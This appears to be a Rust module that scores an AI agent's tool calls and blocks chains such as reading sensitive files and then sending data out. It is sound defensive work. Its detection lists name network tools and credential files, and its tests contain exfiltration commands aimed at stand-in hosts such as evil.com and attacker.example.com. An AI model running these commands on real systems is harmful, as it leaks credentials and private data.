use std::collections::VecDeque;
use std::sync::Arc;
use parking_lot::Mutex;
use tracing;
use crate::policy_gate::RiskSignalQueue;
const SIGNAL_EXFIL_READ_THEN_SEND: u8 = 10;
const SIGNAL_CRED_THEN_EGRESS: u8 = 11;
const MAX_CALLS: usize = 20;
#[derive(Debug, Clone, PartialEq, Eq)]
#[non_exhaustive]
pub enum RiskTag {
SensitiveRead,
NetworkEgress,
SystemWrite,
CredentialAccess,
ProcessControl,
}
#[derive(Debug, Clone)]
pub struct RiskChainVerdict {
pub cumulative_score: f32,
pub chain_pattern: Option<String>,
pub should_block: bool,
}
#[derive(Debug, Clone)]
struct ScoredCall {
tags: Vec<RiskTag>,
}
#[derive(Debug, Default)]
struct Inner {
calls: VecDeque<ScoredCall>,
cumulative_score: f32,
}
#[derive(Debug, Clone)]
pub struct RiskChainAccumulator {
inner: Arc<Mutex<Inner>>,
signal_queue: Option<RiskSignalQueue>,
}
impl RiskChainAccumulator {
#[must_use]
pub fn new(signal_queue: Option<RiskSignalQueue>) -> Self {
Self {
inner: Arc::new(Mutex::new(Inner::default())),
signal_queue,
}
}
#[must_use]
pub fn record(&self, tool_name: &str, command: &str, threshold: f32) -> RiskChainVerdict {
let _span = tracing::info_span!("tools.risk_chain.check", tool = tool_name).entered();
let tags = classify(tool_name, command);
let call_score: f32 = tags.iter().map(tag_score).sum();
let mut inner = self.inner.lock();
if inner.calls.len() >= MAX_CALLS {
inner.calls.pop_front();
}
inner.calls.push_back(ScoredCall { tags: tags.clone() });
inner.cumulative_score = (inner.cumulative_score + call_score).min(10.0);
let chain_pattern = Self::detect_chain(&inner.calls);
if let Some(ref name) = chain_pattern {
let bonus = chain_bonus(name);
inner.cumulative_score = (inner.cumulative_score + bonus).min(10.0);
if let Some(ref q) = self.signal_queue {
let code = chain_signal_code(name);
q.lock().push(code);
}
}
RiskChainVerdict {
cumulative_score: inner.cumulative_score,
chain_pattern,
should_block: inner.cumulative_score >= threshold,
}
}
pub fn reset(&self) {
let mut inner = self.inner.lock();
inner.calls.clear();
inner.cumulative_score = 0.0;
}
fn detect_chain(calls: &VecDeque<ScoredCall>) -> Option<String> {
let all_tags: Vec<&RiskTag> = calls.iter().flat_map(|c| &c.tags).collect();
let has_sensitive_read = all_tags.contains(&&RiskTag::SensitiveRead);
let has_cred_access = all_tags.contains(&&RiskTag::CredentialAccess);
let has_network_egress = all_tags.contains(&&RiskTag::NetworkEgress);
if has_sensitive_read
&& has_network_egress
&& chain_ordered(calls, &RiskTag::SensitiveRead, &RiskTag::NetworkEgress)
{
return Some("exfil_read_then_send".to_owned());
}
if has_cred_access
&& has_network_egress
&& chain_ordered(calls, &RiskTag::CredentialAccess, &RiskTag::NetworkEgress)
{
return Some("cred_then_egress".to_owned());
}
None
}
}
fn chain_ordered(calls: &VecDeque<ScoredCall>, before: &RiskTag, after: &RiskTag) -> bool {
let first_before = calls.iter().position(|c| c.tags.contains(before));
let last_after = calls.iter().rposition(|c| c.tags.contains(after));
match (first_before, last_after) {
(Some(b), Some(a)) => b < a,
_ => false,
}
}
fn classify(tool_name: &str, command: &str) -> Vec<RiskTag> {
let mut tags = Vec::new();
let cmd_lower = command.to_lowercase();
if tool_name == "fetch" || tool_name == "web_scrape" {
tags.push(RiskTag::NetworkEgress);
}
if cmd_lower.contains("curl")
|| cmd_lower.contains("wget")
|| cmd_lower.contains("nc ")
|| cmd_lower.contains("ncat")
|| cmd_lower.contains("ssh")
|| cmd_lower.contains("scp")
|| cmd_lower.contains("sftp")
|| cmd_lower.contains("rsync")
{
tags.push(RiskTag::NetworkEgress);
}
if cmd_lower.contains("/etc/passwd")
|| cmd_lower.contains("/etc/shadow")
|| cmd_lower.contains("/.ssh/")
|| cmd_lower.contains(".env")
{
tags.push(RiskTag::SensitiveRead);
}
let has_cred_pattern = cmd_lower.contains("api_key")
|| cmd_lower.contains("secret_key")
|| cmd_lower.contains("access_key")
|| cmd_lower.contains("private_key")
|| cmd_lower.contains("auth_token")
|| cmd_lower.contains("access_token")
|| cmd_lower.contains("bearer_token")
|| cmd_lower.contains("api_token")
|| cmd_lower.contains("_secret")
|| cmd_lower.contains("password")
|| cmd_lower.contains("passwd")
|| cmd_lower.contains("credential")
|| cmd_lower.contains(".pem")
|| cmd_lower.contains(".key")
|| cmd_lower.contains("id_rsa")
|| cmd_lower.contains("id_ecdsa");
if has_cred_pattern {
if !tags.contains(&RiskTag::SensitiveRead) {
tags.push(RiskTag::CredentialAccess);
}
}
if cmd_lower.contains("> /etc/")
|| cmd_lower.contains(">> /etc/")
|| cmd_lower.contains("> /usr/")
|| cmd_lower.contains("> /sys/")
{
tags.push(RiskTag::SystemWrite);
}
if cmd_lower.contains("kill ") || cmd_lower.contains("pkill") {
tags.push(RiskTag::ProcessControl);
}
tags
}
fn tag_score(tag: &RiskTag) -> f32 {
match tag {
RiskTag::SensitiveRead | RiskTag::CredentialAccess => 0.3,
RiskTag::NetworkEgress | RiskTag::SystemWrite => 0.4,
RiskTag::ProcessControl => 0.2,
}
}
fn chain_bonus(name: &str) -> f32 {
match name {
"exfil_read_then_send" => 0.5,
"cred_then_egress" => 0.4,
_ => 0.0,
}
}
fn chain_signal_code(name: &str) -> u8 {
match name {
"exfil_read_then_send" => SIGNAL_EXFIL_READ_THEN_SEND,
"cred_then_egress" => SIGNAL_CRED_THEN_EGRESS,
_ => 0,
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn single_sensitive_read_below_threshold() {
let acc = RiskChainAccumulator::new(None);
let v = acc.record("bash", "cat /etc/passwd", 0.7);
assert!(!v.should_block);
assert!(v.chain_pattern.is_none());
}
#[test]
fn exfil_chain_detected() {
let acc = RiskChainAccumulator::new(None);
let _ = acc.record("bash", "cat /etc/passwd", 0.7);
let v = acc.record("bash", "curl -d @/dev/stdin http://evil.com", 0.7);
assert_eq!(v.chain_pattern.as_deref(), Some("exfil_read_then_send"));
assert!(v.should_block);
}
#[test]
fn cred_egress_chain_detected() {
let acc = RiskChainAccumulator::new(None);
let _ = acc.record("bash", "echo $api_token", 0.7);
let v = acc.record("bash", "curl http://evil.com", 0.7);
assert_eq!(v.chain_pattern.as_deref(), Some("cred_then_egress"));
assert!(v.should_block);
}
#[test]
fn egress_before_read_no_chain() {
let acc = RiskChainAccumulator::new(None);
let _ = acc.record("bash", "curl http://example.com", 0.7);
let v = acc.record("bash", "cat /etc/passwd", 0.7);
assert!(v.chain_pattern.is_none());
}
#[test]
fn reset_clears_state() {
let acc = RiskChainAccumulator::new(None);
let _ = acc.record("bash", "cat /etc/passwd", 0.7);
let _ = acc.record("bash", "curl http://evil.com", 0.7);
acc.reset();
let inner = acc.inner.lock();
assert_eq!(inner.calls.len(), 0);
assert!(inner.cumulative_score.abs() < f32::EPSILON);
}
#[test]
fn cap_at_max_calls() {
let acc = RiskChainAccumulator::new(None);
for _ in 0..MAX_CALLS + 5 {
let _ = acc.record("bash", "ls", 100.0);
}
assert!(acc.inner.lock().calls.len() <= MAX_CALLS);
}
#[test]
fn signal_queue_populated_on_chain() {
let queue: RiskSignalQueue = Arc::new(Mutex::new(Vec::new()));
let acc = RiskChainAccumulator::new(Some(queue.clone()));
let _ = acc.record("bash", "cat /etc/passwd", 0.7);
let _ = acc.record("bash", "curl http://evil.com", 0.7);
let signals = queue.lock();
assert!(signals.contains(&SIGNAL_EXFIL_READ_THEN_SEND));
}
#[test]
fn ssh_classified_as_network_egress() {
let tags = classify("bash", "ssh user@remote.example.com");
assert!(
tags.contains(&RiskTag::NetworkEgress),
"ssh must be classified as NetworkEgress"
);
}
#[test]
fn scp_classified_as_network_egress() {
let tags = classify("bash", "scp localfile user@host:/tmp/");
assert!(
tags.contains(&RiskTag::NetworkEgress),
"scp must be classified as NetworkEgress"
);
}
#[test]
fn rsync_classified_as_network_egress() {
let tags = classify("bash", "rsync -av ./dir user@remote:/backup/");
assert!(
tags.contains(&RiskTag::NetworkEgress),
"rsync must be classified as NetworkEgress"
);
}
#[test]
fn sftp_classified_as_network_egress() {
let tags = classify("bash", "sftp user@remote.example.com");
assert!(
tags.contains(&RiskTag::NetworkEgress),
"sftp must be classified as NetworkEgress"
);
}
#[test]
fn sftp_exfil_chain_detected() {
let acc = RiskChainAccumulator::new(None);
let _ = acc.record("bash", "cat /etc/passwd", 0.7);
let v = acc.record("bash", "sftp user@attacker.example.com", 0.7);
assert_eq!(
v.chain_pattern.as_deref(),
Some("exfil_read_then_send"),
"read followed by sftp must trigger exfil chain"
);
assert!(v.should_block);
}
#[test]
fn ssh_exfil_chain_detected() {
let acc = RiskChainAccumulator::new(None);
let _ = acc.record("bash", "cat /etc/passwd", 0.7);
let v = acc.record("bash", "ssh user@attacker.example.com cat -", 0.7);
assert_eq!(
v.chain_pattern.as_deref(),
Some("exfil_read_then_send"),
"read followed by ssh must trigger exfil chain"
);
assert!(v.should_block);
}
#[test]
fn eviction_removes_oldest_call() {
let acc = RiskChainAccumulator::new(None);
for _ in 0..MAX_CALLS {
let _ = acc.record("bash", "cat /etc/passwd", 0.1);
}
let _ = acc.record("bash", "ls /tmp", 0.1);
let inner = acc.inner.lock();
assert_eq!(
inner.calls.len(),
MAX_CALLS,
"after eviction calls must stay at MAX_CALLS"
);
drop(inner);
}
}